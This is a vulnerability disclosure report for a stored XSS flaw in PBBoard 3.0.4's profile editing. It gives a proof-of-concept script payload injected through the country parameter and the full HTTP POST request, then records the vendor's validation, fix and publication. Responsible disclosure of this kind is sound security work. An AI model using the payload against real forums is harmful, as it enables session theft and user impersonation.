Stored XSS in Edit user member profile in pbboard/pbboard-3.0.4


Reported on

Apr 4th 2023


When making changes to update information, there is a country parameter to insert the xss payload

Step 1 : Update user Personal information

Proof of Concept

// PoC request:  
// payload: "><script>alert(String.fromCharCode(88,83))</script>

POST /pbboard/index.php?page=usercp&control=1&info=1&start=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/pbboard/index.php?page=usercp&control=1&info=1&main=1
Cookie: eid=2; download_started=0; PHPSESSID=dngclv00c2khlomtdkccv6vfh2; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; PowerBB_lastvisit=1680611668; plupload_ui_view=thumbs
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


Example Image

Step 2. Click on the post of user was edit Example Image

Step 3. Alert XSS show Example Image


XSS can cause serious issues. Attackers often leverage XSS to steal session cookies and impersonate the user

We are processing your report and will contact the pbboard/pbboard-3.0.4 team within 24 hours. 8 months ago
TuanTH modified the report
8 months ago
We have contacted a member of the pbboard/pbboard-3.0.4 team and are waiting to hear back 8 months ago
PBBoard Forum Software validated this vulnerability 8 months ago

bug was successfully fixed.

TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
PBBoard Forum Software marked this as fixed in 3.0.4 with commit c391ca 8 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
PBBoard Forum Software published this vulnerability 8 months ago
8 months ago


I check the XSS vulnerability in the profile has been fixed

to join this conversation